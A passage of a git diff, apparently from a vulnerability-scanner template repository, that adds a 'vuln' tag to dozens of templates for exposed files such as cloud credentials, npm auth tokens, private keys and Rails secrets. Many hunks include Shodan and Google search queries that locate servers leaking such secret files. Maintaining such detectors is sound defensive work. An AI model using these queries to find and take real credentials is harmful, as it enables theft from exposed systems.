https://github.com/lijiejie/ds_store_exp metadata: max-request: 1 - tags: exposure,files,ds_store,config + tags: exposure,files,ds_store,config,vuln http: - method: GET diff --git a/http/exposures/files/dwsync-exposure.yaml b/http/exposures/files/dwsync-exposure.yaml index 835905a285f..33bfcebbb84 100644 --- a/http/exposures/files/dwsync-exposure.yaml +++ b/http/exposures/files/dwsync-exposure.yaml @@ -9,7 +9,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: dwsync,exposure,dreamweaver,files + tags: dwsync,exposure,dreamweaver,files,vuln http: - method: GET diff --git a/http/exposures/files/elastic-kibana-config.yaml b/http/exposures/files/elastic-kibana-config.yaml index 69e3e5eb5f7..c2095d90e81 100644 --- a/http/exposures/files/elastic-kibana-config.yaml +++ b/http/exposures/files/elastic-kibana-config.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 fofa-query: body="kibana.yml" - tags: exposure,elastic,kibana,files,config + tags: exposure,elastic,kibana,files,config,vuln http: - method: GET diff --git a/http/exposures/files/environment-rb.yaml b/http/exposures/files/environment-rb.yaml index 00e40cc893e..8c7e48d778b 100644 --- a/http/exposures/files/environment-rb.yaml +++ b/http/exposures/files/environment-rb.yaml @@ -13,7 +13,7 @@ info: vendor: ruby-lang product: ruby google-query: intitle:"index of" "environment.rb" - tags: ruby,devops,exposure,files + tags: ruby,devops,exposure,files,vuln http: - method: GET diff --git a/http/exposures/files/exposed-alps-spring.yaml b/http/exposures/files/exposed-alps-spring.yaml index e3ec5bc98cb..76811410c70 100644 --- a/http/exposures/files/exposed-alps-spring.yaml +++ b/http/exposures/files/exposed-alps-spring.yaml @@ -9,7 +9,7 @@ info: - https://niemand.com.ar/2021/01/08/exploiting-application-level-profile-semantics-apls-from-spring-data-rest/ metadata: max-request: 3 - tags: exposure,spring,files + tags: exposure,spring,files,vuln http: - method: GET diff --git a/http/exposures/files/exposed-pki-cert.yaml b/http/exposures/files/exposed-pki-cert.yaml index 45b584d1930..5edfd92892b 100644 --- a/http/exposures/files/exposed-pki-cert.yaml +++ b/http/exposures/files/exposed-pki-cert.yaml @@ -9,7 +9,7 @@ info: metadata: verified: true max-request: 10 - tags: pki,exposure,misconfig + tags: pki,exposure,misconfig,vuln http: - method: GET diff --git a/http/exposures/files/filezilla.yaml b/http/exposures/files/filezilla.yaml index 79ea157ea77..2066717ebe5 100644 --- a/http/exposures/files/filezilla.yaml +++ b/http/exposures/files/filezilla.yaml @@ -7,7 +7,7 @@ info: description: Filezilla internal file is exposed. metadata: max-request: 3 - tags: exposure,files + tags: exposure,files,vuln http: - method: GET diff --git a/http/exposures/files/ftpconfig.yaml b/http/exposures/files/ftpconfig.yaml index 8bbf28e9264..818018de455 100644 --- a/http/exposures/files/ftpconfig.yaml +++ b/http/exposures/files/ftpconfig.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 1 shodan-query: html:ftpconfig - tags: atom,ftp,config,exposure,files + tags: atom,ftp,config,exposure,files,vuln http: - method: GET diff --git a/http/exposures/files/gcloud-access-token.yaml b/http/exposures/files/gcloud-access-token.yaml index cca57f37e11..340799ef5e2 100644 --- a/http/exposures/files/gcloud-access-token.yaml +++ b/http/exposures/files/gcloud-access-token.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 2 shodan-query: html:"access_tokens.db" - tags: google,cloud,devops,exposure,files + tags: google,cloud,devops,exposure,files,vuln http: - method: GET diff --git a/http/exposures/files/gcloud-credentials.yaml b/http/exposures/files/gcloud-credentials.yaml index bf297f99d4f..1e3f285ad7e 100644 --- a/http/exposures/files/gcloud-credentials.yaml +++ b/http/exposures/files/gcloud-credentials.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 2 shodan-query: html:"credentials.db" - tags: google,cloud,devops,exposure,files + tags: google,cloud,devops,exposure,files,vuln http: - method: GET diff --git a/http/exposures/files/generic-db.yaml b/http/exposures/files/generic-db.yaml index e44e27c0f73..de6d2270987 100644 --- a/http/exposures/files/generic-db.yaml +++ b/http/exposures/files/generic-db.yaml @@ -43,7 +43,7 @@ info: cvss-score: 7.5 metadata: max-request: 89 - tags: files,database,exposure,sqlite,sqlite3,fuzz,sqli + tags: files,database,exposure,sqlite,sqlite3,fuzz,sqli,vuln http: - method: GET diff --git a/http/exposures/files/get-access-token-json.yaml b/http/exposures/files/get-access-token-json.yaml index 230aaca1938..da875a661fb 100644 --- a/http/exposures/files/get-access-token-json.yaml +++ b/http/exposures/files/get-access-token-json.yaml @@ -13,7 +13,7 @@ info: vendor: constantcontact product: constant_contact_forms google-query: intitle:"index of" "get_access_token.json" - tags: exposure,files + tags: exposure,files,vuln http: - method: GET diff --git a/http/exposures/files/git-mailmap.yaml b/http/exposures/files/git-mailmap.yaml index 89c15898f48..5de45001251 100644 --- a/http/exposures/files/git-mailmap.yaml +++ b/http/exposures/files/git-mailmap.yaml @@ -14,7 +14,7 @@ info: vendor: git-scm product: git shodan-query: html:mailmap - tags: config,exposure,git,mailmap,files + tags: config,exposure,git,mailmap,files,vuln http: - method: GET diff --git a/http/exposures/files/github-gemfile-files.yaml b/http/exposures/files/github-gemfile-files.yaml index 68e290c4c40..ced1b465dd2 100644 --- a/http/exposures/files/github-gemfile-files.yaml +++ b/http/exposures/files/github-gemfile-files.yaml @@ -7,7 +7,7 @@ info: description: Find github page files(Gemfile / Gemfile.lock) metadata: max-request: 2 - tags: github,exposure,files + tags: github,exposure,files,vuln http: - method: GET diff --git a/http/exposures/files/github-page-config.yaml b/http/exposures/files/github-page-config.yaml index ff902ac1f0f..ae010e8561b 100644 --- a/http/exposures/files/github-page-config.yaml +++ b/http/exposures/files/github-page-config.yaml @@ -7,7 +7,7 @@ info: description: Find github pages config file. metadata: max-request: 1 - tags: github,exposure,config,files + tags: github,exposure,config,files,vuln http: - method: GET diff --git a/http/exposures/files/gitlab-ci-yml.yaml b/http/exposures/files/gitlab-ci-yml.yaml index c3cca0f42c9..d7114ad1999 100644 --- a/http/exposures/files/gitlab-ci-yml.yaml +++ b/http/exposures/files/gitlab-ci-yml.yaml @@ -18,7 +18,7 @@ info: vendor: gitlab product: gitlab shodan-query: html:"gitlab-ci.yml" - tags: exposure,config,cicd,gitlab + tags: exposure,config,cicd,gitlab,vuln http: - method: GET diff --git a/http/exposures/files/glpi-status-ldap-domain-disclosure.yaml b/http/exposures/files/glpi-status-ldap-domain-disclosure.yaml index eb69b41d5f3..08815a38da5 100644 --- a/http/exposures/files/glpi-status-ldap-domain-disclosure.yaml +++ b/http/exposures/files/glpi-status-ldap-domain-disclosure.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 3 - tags: glpi,exposure,status,files + tags: glpi,exposure,status,files,vuln http: - method: GET diff --git a/http/exposures/files/go-mod-disclosure.yaml b/http/exposures/files/go-mod-disclosure.yaml index 8a0e58b4a44..2a7f24c6ff0 100644 --- a/http/exposures/files/go-mod-disclosure.yaml +++ b/http/exposures/files/go-mod-disclosure.yaml @@ -13,7 +13,7 @@ info: vendor: golang product: go shodan-query: html:"go.mod" - tags: exposure,files,go + tags: exposure,files,go,vuln http: - method: GET diff --git a/http/exposures/files/google-api-private-key.yaml b/http/exposures/files/google-api-private-key.yaml index 6f9fac4e8fa..abd78f80bb3 100644 --- a/http/exposures/files/google-api-private-key.yaml +++ b/http/exposures/files/google-api-private-key.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 3 google-query: intitle:"index of" "google-api-private-key.json" - tags: exposure,cloud,google,devops,files + tags: exposure,cloud,google,devops,files,vuln http: - method: GET diff --git a/http/exposures/files/google-services-json.yaml b/http/exposures/files/google-services-json.yaml index 3c3daa2ba8d..a1ffc468ae9 100644 --- a/http/exposures/files/google-services-json.yaml +++ b/http/exposures/files/google-services-json.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 3 google-query: intitle:"index of" "google-services.json" - tags: google,cloud,exposure,files + tags: google,cloud,exposure,files,vuln http: - method: GET diff --git a/http/exposures/files/gradle-libs.yaml b/http/exposures/files/gradle-libs.yaml index c21977453dc..bef1985189c 100644 --- a/http/exposures/files/gradle-libs.yaml +++ b/http/exposures/files/gradle-libs.yaml @@ -12,7 +12,7 @@ info: vendor: gradle product: gradle github-query: filename:libs.versions.toml - tags: file,gradle,exposure + tags: file,gradle,exposure,vuln http: - method: GET diff --git a/http/exposures/files/gunicorn-config-file.yaml b/http/exposures/files/gunicorn-config-file.yaml index 65bda53586b..3abb02b8acc 100644 --- a/http/exposures/files/gunicorn-config-file.yaml +++ b/http/exposures/files/gunicorn-config-file.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: html:"gunicorn.conf.py" - tags: exposure,files,gunicorn + tags: exposure,files,gunicorn,vuln http: - method: GET diff --git a/http/exposures/files/haproxy-config-file.yaml b/http/exposures/files/haproxy-config-file.yaml index a369c5d1dec..b1223a91e87 100644 --- a/http/exposures/files/haproxy-config-file.yaml +++ b/http/exposures/files/haproxy-config-file.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: html:"haproxy.cfg" - tags: exposure,files,haproxy + tags: exposure,files,haproxy,vuln http: - method: GET diff --git a/http/exposures/files/ht-deployment.yaml b/http/exposures/files/ht-deployment.yaml index 2d05ceaffaf..c7ce3b58abd 100644 --- a/http/exposures/files/ht-deployment.yaml +++ b/http/exposures/files/ht-deployment.yaml @@ -18,7 +18,7 @@ info: max-request: 2 vendor: dg product: ftp-deployment - tags: files,exposure,php,deployment,cache,dg + tags: files,exposure,php,deployment,cache,dg,vuln http: - method: GET diff --git a/http/exposures/files/icecast-config.yaml b/http/exposures/files/icecast-config.yaml index e54a0a1fd04..20d5d5ac842 100644 --- a/http/exposures/files/icecast-config.yaml +++ b/http/exposures/files/icecast-config.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 fofa-query: body="icecast.xml" - tags: exposure,icecast,config,files + tags: exposure,icecast,config,files,vuln http: - method: GET diff --git a/http/exposures/files/iceflow-vpn-disclosure.yaml b/http/exposures/files/iceflow-vpn-disclosure.yaml index 6343544c512..b5e4fd955a3 100644 --- a/http/exposures/files/iceflow-vpn-disclosure.yaml +++ b/http/exposures/files/iceflow-vpn-disclosure.yaml @@ -7,7 +7,7 @@ info: description: ICEFlow VPN internal log file is exposed. metadata: max-request: 8 - tags: exposure,files,iceflow,logs + tags: exposure,files,iceflow,logs,vuln http: - method: GET diff --git a/http/exposures/files/idea-folder-exposure.yaml b/http/exposures/files/idea-folder-exposure.yaml index 1273f44ed18..7793db761d3 100644 --- a/http/exposures/files/idea-folder-exposure.yaml +++ b/http/exposures/files/idea-folder-exposure.yaml @@ -7,7 +7,7 @@ info: description: Searches for .idea Folder by querying the /.idea and a few other files with sensitive data. metadata: max-request: 2 - tags: phpstorm,jetbrains,idea,exposure,files + tags: phpstorm,jetbrains,idea,exposure,files,vuln http: - method: GET diff --git a/http/exposures/files/ioncube-loader-wizard.yaml b/http/exposures/files/ioncube-loader-wizard.yaml index 239071ccbc7..0ec1e4c0f66 100644 --- a/http/exposures/files/ioncube-loader-wizard.yaml +++ b/http/exposures/files/ioncube-loader-wizard.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 2 - tags: ioncube,disclosure,exposure + tags: ioncube,disclosure,exposure,vuln http: - method: GET diff --git a/http/exposures/files/javascript-env.yaml b/http/exposures/files/javascript-env.yaml index 2cc9f393e01..fc4f3be80e9 100644 --- a/http/exposures/files/javascript-env.yaml +++ b/http/exposures/files/javascript-env.yaml @@ -7,7 +7,7 @@ info: description: Multiple common JavaScript environment configuration files were detected. metadata: max-request: 7 - tags: javascript,config,exposure + tags: javascript,config,exposure,vuln http: - method: GET diff --git a/http/exposures/files/jetbrains-webservers.yaml b/http/exposures/files/jetbrains-webservers.yaml index 139dec79d16..cd3a69c0845 100644 --- a/http/exposures/files/jetbrains-webservers.yaml +++ b/http/exposures/files/jetbrains-webservers.yaml @@ -16,7 +16,7 @@ info: verified: true max-request: 3 google-query: intitle:"index of" "WebServers.xml" - tags: jetbrains,config,edb,files,exposure + tags: jetbrains,config,edb,files,exposure,vuln http: - method: GET diff --git a/http/exposures/files/joomla-file-listing.yaml b/http/exposures/files/joomla-file-listing.yaml index f4d29c69caf..84185d7c3cd 100644 --- a/http/exposures/files/joomla-file-listing.yaml +++ b/http/exposures/files/joomla-file-listing.yaml @@ -14,7 +14,7 @@ info: cwe-id: CWE-548 metadata: max-request: 1 - tags: exposure,joomla,listing,database,edb + tags: exposure,joomla,listing,database,edb,vuln http: - method: GET diff --git a/http/exposures/files/jsapi-ticket-json.yaml b/http/exposures/files/jsapi-ticket-json.yaml index fcc14b0af53..319868988c7 100644 --- a/http/exposures/files/jsapi-ticket-json.yaml +++ b/http/exposures/files/jsapi-ticket-json.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 google-query: intitle:"index of" "jsapi_ticket.json" - tags: exposure,jsapi,files + tags: exposure,jsapi,files,vuln http: - method: GET diff --git a/http/exposures/files/keycloak-json.yaml b/http/exposures/files/keycloak-json.yaml index ae42e20d4a0..be8dfde2c4d 100644 --- a/http/exposures/files/keycloak-json.yaml +++ b/http/exposures/files/keycloak-json.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 1 - tags: exposure,keycloak,config,files + tags: exposure,keycloak,config,files,vuln http: - method: GET diff --git a/http/exposures/files/kubernetes-etcd-keys.yaml b/http/exposures/files/kubernetes-etcd-keys.yaml index 46c27689652..b6b490c31c4 100644 --- a/http/exposures/files/kubernetes-etcd-keys.yaml +++ b/http/exposures/files/kubernetes-etcd-keys.yaml @@ -11,7 +11,7 @@ info: verified: true max-request: 1 github-query: filename:apiserver-etcd-client.key - tags: files,exposure,kubernetes,k8s + tags: files,exposure,kubernetes,k8s,vuln http: - method: GET diff --git a/http/exposures/files/lazy-file.yaml b/http/exposures/files/lazy-file.yaml index 3c086e4f872..1e3559ae773 100644 --- a/http/exposures/files/lazy-file.yaml +++ b/http/exposures/files/lazy-file.yaml @@ -7,7 +7,7 @@ info: description: lfm.php file in exposed in Lazy File Manager. metadata: max-request: 1 - tags: exposure + tags: exposure,vuln http: - method: GET diff --git a/http/exposures/files/lighttpd-config-file.yaml b/http/exposures/files/lighttpd-config-file.yaml index d21a8c5fb5e..a4c62b7a754 100644 --- a/http/exposures/files/lighttpd-config-file.yaml +++ b/http/exposures/files/lighttpd-config-file.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: html:"lighttpd.conf" - tags: exposure,files,lighttpd + tags: exposure,files,lighttpd,vuln http: - method: GET diff --git a/http/exposures/files/log4-properties.yaml b/http/exposures/files/log4-properties.yaml index 7c64f8bd2d9..d4e8889f117 100644 --- a/http/exposures/files/log4-properties.yaml +++ b/http/exposures/files/log4-properties.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: html:"log4j.properties" - tags: exposure,files,log4j,oracle + tags: exposure,files,log4j,oracle,vuln http: - method: GET diff --git a/http/exposures/files/next-js-config-file.yaml b/http/exposures/files/next-js-config-file.yaml index 4989f9a8f25..7ec79226611 100644 --- a/http/exposures/files/next-js-config-file.yaml +++ b/http/exposures/files/next-js-config-file.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: html:"next.config.js" - tags: exposure,files,nextjs + tags: exposure,files,nextjs,vuln http: - method: GET diff --git a/http/exposures/files/npm-anonymous-cli.yaml b/http/exposures/files/npm-anonymous-cli.yaml index f83edaa884c..d35ff0bb33c 100644 --- a/http/exposures/files/npm-anonymous-cli.yaml +++ b/http/exposures/files/npm-anonymous-cli.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 2 shodan-query: html:"anonymous-cli-metrics.json" - tags: exposure,npm,config,files + tags: exposure,npm,config,files,vuln http: - method: GET diff --git a/http/exposures/files/npm-cli-metrics-json.yaml b/http/exposures/files/npm-cli-metrics-json.yaml index a525adab17f..cbb8d639c54 100644 --- a/http/exposures/files/npm-cli-metrics-json.yaml +++ b/http/exposures/files/npm-cli-metrics-json.yaml @@ -13,7 +13,7 @@ info: vendor: npmjs product: npm shodan-query: html:"anonymous-cli-metrics.json" - tags: npm,devops,exposure,files + tags: npm,devops,exposure,files,vuln http: - method: GET diff --git a/http/exposures/files/npm-shrinkwrap-exposure.yaml b/http/exposures/files/npm-shrinkwrap-exposure.yaml index e265216e2dc..f7a50fadaa5 100644 --- a/http/exposures/files/npm-shrinkwrap-exposure.yaml +++ b/http/exposures/files/npm-shrinkwrap-exposure.yaml @@ -16,7 +16,7 @@ info: vendor: npmjs product: npm shodan-query: html:"npm-shrinkwrap.json" - tags: config,exposure,npm,files,node + tags: config,exposure,npm,files,node,vuln http: - method: GET diff --git a/http/exposures/files/npmrc-authtoken.yaml b/http/exposures/files/npmrc-authtoken.yaml index a20b6069323..4598e8eedaf 100644 --- a/http/exposures/files/npmrc-authtoken.yaml +++ b/http/exposures/files/npmrc-authtoken.yaml @@ -11,7 +11,7 @@ info: verified: true max-request: 1 google-query: intitle:"index of" ".npmrc" - tags: npm,exposure + tags: npm,exposure,vuln http: - method: GET diff --git a/http/exposures/files/nuget-package-config.yaml b/http/exposures/files/nuget-package-config.yaml index 58b1aa91906..cde96ca6881 100644 --- a/http/exposures/files/nuget-package-config.yaml +++ b/http/exposures/files/nuget-package-config.yaml @@ -15,7 +15,7 @@ info: vendor: microsoft product: nuget shodan-query: html:"packages.config" - tags: exposure,sass,devops,cicd,nuget,files + tags: exposure,sass,devops,cicd,nuget,files,vuln http: - method: GET diff --git a/http/exposures/files/nuxtjs-config-file.yaml b/http/exposures/files/nuxtjs-config-file.yaml index d96743477db..3c282138b7f 100644 --- a/http/exposures/files/nuxtjs-config-file.yaml +++ b/http/exposures/files/nuxtjs-config-file.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: html:"nuxt.config.ts" - tags: exposure,files,nuxtjs + tags: exposure,files,nuxtjs,vuln http: - method: GET diff --git a/http/exposures/files/oauth-credentials-json.yaml b/http/exposures/files/oauth-credentials-json.yaml index f9960568ac9..1272061fdb3 100644 --- a/http/exposures/files/oauth-credentials-json.yaml +++ b/http/exposures/files/oauth-credentials-json.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 1 google-query: intitle:"index of" "oauth-credentials.json" - tags: exposure,oauth,files + tags: exposure,oauth,files,vuln http: - method: GET diff --git a/http/exposures/files/openstack-user-secrets.yaml b/http/exposures/files/openstack-user-secrets.yaml index f3633d6bd38..fb5c8fe03ec 100644 --- a/http/exposures/files/openstack-user-secrets.yaml +++ b/http/exposures/files/openstack-user-secrets.yaml @@ -11,7 +11,7 @@ info: verified: true max-request: 2 github-query: filename:user_secrets.yml - tags: openstack,config,exposure,files + tags: openstack,config,exposure,files,vuln http: - method: GET diff --git a/http/exposures/files/oracle-test-cgi.yaml b/http/exposures/files/oracle-test-cgi.yaml index 47525f02ac9..2a0dce17e23 100644 --- a/http/exposures/files/oracle-test-cgi.yaml +++ b/http/exposures/files/oracle-test-cgi.yaml @@ -12,7 +12,7 @@ info: vendor: oracle product: http_server shodan-query: title:"Oracle Application Server" - tags: oracle,exposure + tags: oracle,exposure,vuln http: - method: GET diff --git a/http/exposures/files/pantheon-upstream.yaml b/http/exposures/files/pantheon-upstream.yaml index 76afad972c1..76ecc2730df 100644 --- a/http/exposures/files/pantheon-upstream.yaml +++ b/http/exposures/files/pantheon-upstream.yaml @@ -11,7 +11,7 @@ info: verified: true max-request: 1 google-query: intitle:"index of" "pantheon.upstream.yml" - tags: exposure,devops,patheon,config,files + tags: exposure,devops,patheon,config,files,vuln http: - method: GET diff --git a/http/exposures/files/php-cs-cache.yaml b/http/exposures/files/php-cs-cache.yaml index 13bfc6bacee..500357a7ec6 100644 --- a/http/exposures/files/php-cs-cache.yaml +++ b/http/exposures/files/php-cs-cache.yaml @@ -11,7 +11,7 @@ info: verified: true max-request: 1 shodan-query: html:"php_cs.cache" - tags: exposure,files,php + tags: exposure,files,php,vuln http: - method: GET diff --git a/http/exposures/files/php-ini.yaml b/http/exposures/files/php-ini.yaml index 44f8fbb9677..5ed736eabf2 100644 --- a/http/exposures/files/php-ini.yaml +++ b/http/exposures/files/php-ini.yaml @@ -14,7 +14,7 @@ info: vendor: php product: php shodan-query: php.ini - tags: config,exposure,files + tags: config,exposure,files,vuln http: - method: GET diff --git a/http/exposures/files/php-user-ini-disclosure.yaml b/http/exposures/files/php-user-ini-disclosure.yaml index 7b0e99fbce7..54167d2c72c 100644 --- a/http/exposures/files/php-user-ini-disclosure.yaml +++ b/http/exposures/files/php-user-ini-disclosure.yaml @@ -9,7 +9,7 @@ info: - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/php-user-ini-disclosure.json metadata: max-request: 2 - tags: exposure,config,files + tags: exposure,config,files,vuln http: - method: GET diff --git a/http/exposures/files/phpunit-result-cache-exposure.yaml b/http/exposures/files/phpunit-result-cache-exposure.yaml index 9baf9e0f9ea..3fe50d8df91 100644 --- a/http/exposures/files/phpunit-result-cache-exposure.yaml +++ b/http/exposures/files/phpunit-result-cache-exposure.yaml @@ -13,7 +13,7 @@ info: vendor: phpunit_project product: phpunit shodan-query: ".phpunit.result.cache" - tags: config,exposure,devops,files + tags: config,exposure,devops,files,vuln http: - method: GET diff --git a/http/exposures/files/phpunit.yaml b/http/exposures/files/phpunit.yaml index 19823c5b2af..ccd03de2dc8 100644 --- a/http/exposures/files/phpunit.yaml +++ b/http/exposures/files/phpunit.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: exposure,files + tags: exposure,files,vuln http: - method: GET diff --git a/http/exposures/files/pipeline-configuration.yaml b/http/exposures/files/pipeline-configuration.yaml index c9eb3866d51..1db7bada479 100644 --- a/http/exposures/files/pipeline-configuration.yaml +++ b/http/exposures/files/pipeline-configuration.yaml @@ -12,7 +12,7 @@ info: vendor: jenkins product: pipeline\\ shodan-query: html:"pipeline.yaml" - tags: devops,exposure,cicd,files + tags: devops,exposure,cicd,files,vuln http: - method: GET diff --git a/http/exposures/files/pipfile-lock.yaml b/http/exposures/files/pipfile-lock.yaml index 72fd63472d0..824ed4f83af 100644 --- a/http/exposures/files/pipfile-lock.yaml +++ b/http/exposures/files/pipfile-lock.yaml @@ -8,7 +8,7 @@ info: verified: true max-request: 1 shodan-query: html:"Pipfile" - tags: exposure,pip,devops,cicd,files + tags: exposure,pip,devops,cicd,files,vuln http: - method: GET diff --git a/http/exposures/files/pnpm-lock.yaml b/http/exposures/files/pnpm-lock.yaml index 39dbdb84c59..c87eb2cc095 100644 --- a/http/exposures/files/pnpm-lock.yaml +++ b/http/exposures/files/pnpm-lock.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: html:"pnpm-lock.yaml" - tags: exposure,files,node,npm,pnpm + tags: exposure,files,node,npm,pnpm,vuln http: - method: GET diff --git a/http/exposures/files/putty-private-key-disclosure.yaml b/http/exposures/files/putty-private-key-disclosure.yaml index 2e7cb98eec2..376a50ddc10 100644 --- a/http/exposures/files/putty-private-key-disclosure.yaml +++ b/http/exposures/files/putty-private-key-disclosure.yaml @@ -15,7 +15,7 @@ info: vendor: putty product: putty github-query: filename:putty.ppk - tags: exposure,files + tags: exposure,files,vuln http: - method: GET diff --git a/http/exposures/files/pyproject-disclosure.yaml b/http/exposures/files/pyproject-disclosure.yaml index 904666d9a66..81f79354dbf 100644 --- a/http/exposures/files/pyproject-disclosure.yaml +++ b/http/exposures/files/pyproject-disclosure.yaml @@ -8,7 +8,7 @@ info: - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/pyproject-disclosure.json metadata: max-request: 1 - tags: exposure,files + tags: exposure,files,vuln http: - method: GET diff --git a/http/exposures/files/python-venv-exposure.yaml b/http/exposures/files/python-venv-exposure.yaml index d9f0c985482..415d2f67f6e 100644 --- a/http/exposures/files/python-venv-exposure.yaml +++ b/http/exposures/files/python-venv-exposure.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 google-query: "intitle: Index of /venv" - tags: venv,exposure,python-env,info + tags: venv,exposure,python-env,info,vuln http: - method: GET diff --git a/http/exposures/files/rails-secret-token-disclosure.yaml b/http/exposures/files/rails-secret-token-disclosure.yaml index 32e81cbfd0b..0a90fc630b7 100644 --- a/http/exposures/files/rails-secret-token-disclosure.yaml +++ b/http/exposures/files/rails-secret-token-disclosure.yaml @@ -9,7 +9,7 @@ info: - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/ruby-on-rails-secret-token-disclosure.json metadata: max-request: 1 - tags: exposure,files,rails,ruby,token + tags: exposure,files,rails,ruby,token,vuln http: - method: GET diff --git a/http/exposures/files/reactapp-env-js.yaml b/http/exposures/files/reactapp-env-js.yaml index 0c7a252ebd6..b0ea354efbe 100644 --- a/http/exposures/files/reactapp-env-js.yaml +++ b/http/exposures/files/reactapp-env-js.yaml @@ -8,7 +8,7 @@ info: verified: true max-request: 4 github-query: "REACT_APP_" - tags: react,exposure,config,js,javascript + tags: react,exposure,config,js,javascript,vuln http: - method: GET diff --git a/http/exposures/files/readme-md.yaml b/http/exposures/files/readme-md.yaml index 73195fc7030..d361790dede 100644 --- a/http/exposures/files/readme-md.yaml +++ b/http/exposures/files/readme-md.yaml @@ -8,7 +8,7 @@ info: metadata: max-request: 1 shodan-query: html:"README.MD" - tags: exposure,markdown,files + tags: exposure,markdown,files,vuln http: - method: GET diff --git a/http/exposures/files/redmine-config.yaml b/http/exposures/files/redmine-config.yaml index 383d34d6565..0b883830f27 100644 --- a/http/exposures/files/redmine-config.yaml +++ b/http/exposures/files/redmine-config.yaml @@ -18,7 +18,7 @@ info: google-query: intitle:"index of" configuration.yml product: redmine vendor: redmine - tags: exposure,redmine,devops,edb,files + tags: exposure,redmine,devops,edb,files,vuln http: - method: GET diff --git a/http/exposures/files/redmine-settings.yaml b/http/exposures/files/redmine-settings.yaml index 4bd897a484a..8f8c6fa7d4c 100644 --- a/http/exposures/files/redmine-settings.yaml +++ b/http/exposures/files/redmine-settings.yaml @@ -13,7 +13,7 @@ info: vendor: redmine product: redmine google-query: intitle:"index of" "settings.yml" - tags: misconfig,redmine,devops,files,exposure + tags: misconfig,redmine,devops,files,exposure,vuln http: - method: GET diff --git a/http/exposures/files/routes-ini.yaml b/http/exposures/files/routes-ini.yaml index c8b274a9821..357457c5522 100644 --- a/http/exposures/files/routes-ini.yaml +++ b/http/exposures/files/routes-ini.yaml @@ -9,7 +9,7 @@ info: max-request: 15 google-query: intitle:"index of" "routes.ini" github-query: filename:routes.ini - tags: routes,config,exposure,files + tags: routes,config,exposure,files,vuln http: - method: GET diff --git a/http/exposures/files/ruby-rail-storage.yaml b/http/exposures/files/ruby-rail-storage.yaml index 3e1d34370b9..044b47ff493 100644 --- a/http/exposures/files/ruby-rail-storage.yaml +++ b/http/exposures/files/ruby-rail-storage.yaml @@ -13,7 +13,7 @@ info: vendor: rubyonrails product: rails google-query: intitle:"index of" storage.yml - tags: exposure,ruby,devops,files + tags: exposure,ruby,devops,files,vuln http: - method: GET diff --git a/http/exposures/files/salesforce-credentials.yaml b/http/exposures/files/salesforce-credentials.yaml index fd759f1655e..589c3f687f3 100644 --- a/http/exposures/files/salesforce-credentials.yaml +++ b/http/exposures/files/salesforce-credentials.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 2 - tags: exposure,files,salesforce + tags: exposure,files,salesforce,vuln http: - method: GET diff --git a/http/exposures/files/sass-lint.yaml b/http/exposures/files/sass-lint.yaml index 4ee4c98b260..a3d0877bb9e 100644 --- a/http/exposures/files/sass-lint.yaml +++ b/http/exposures/files/sass-lint.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: html:"sass-lint.yml" - tags: exposure,sass,devops,cicd,files + tags: exposure,sass,devops,cicd,files,vuln http: - method: GET diff --git a/http/exposures/files/secret-token-rb.yaml b/http/exposures/files/secret-token-rb.yaml index 4e7cd5aa75e..4ac5bfae052 100644 --- a/http/exposures/files/secret-token-rb.yaml +++ b/http/exposures/files/secret-token-rb.yaml @@ -13,7 +13,7 @@ info: vendor: rubyonrails product: rails google-query: intitle:"index of" "secret_token.rb" - tags: redmine,devops,exposure,ruby,files + tags: redmine,devops,exposure,ruby,files,vuln http: - method: GET diff --git a/http/exposures/files/secrets-file.yaml b/http/exposures/files/secrets-file.yaml index 3b36b653c72..ad69d59791e 100644 --- a/http/exposures/files/secrets-file.yaml +++ b/http/exposures/files/secrets-file.yaml @@ -14,7 +14,7 @@ info: vendor: rubyonrails product: rails google-query: intitle:"index of" "secrets.yml" - tags: cloud,devops,files,exposure,misconfig + tags: cloud,devops,files,exposure,misconfig,vuln http: - method: GET diff --git a/http/exposures/files/sendgrid-env.yaml b/http/exposures/files/sendgrid-env.yaml index 089488f05c1..3ec9411216a 100644 --- a/http/exposures/files/sendgrid-env.yaml +++ b/http/exposures/files/sendgrid-env.yaml @@ -13,7 +13,7 @@ info: vendor: sendgrid product: sendgrid shodan-query: html:"sendgrid.env" - tags: exposure,sendgrid,key,api,files + tags: exposure,sendgrid,key,api,files,vuln http: - method: GET diff --git a/http/exposures/files/sensitive-storage-exposure.yaml b/http/exposures/files/sensitive-storage-exposure.yaml index b9f8b5e22ac..6ab29e282dc 100644 --- a/http/exposures/files/sensitive-storage-exposure.yaml +++ b/http/exposures/files/sensitive-storage-exposure.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 6 - tags: expose,listing,config,logs,storage,edb,files,exposure + tags: expose,listing,config,logs,storage,edb,files,exposure,vuln http: - method: GET diff --git a/http/exposures/files/service-account-credentials.yaml b/http/exposures/files/service-account-credentials.yaml index 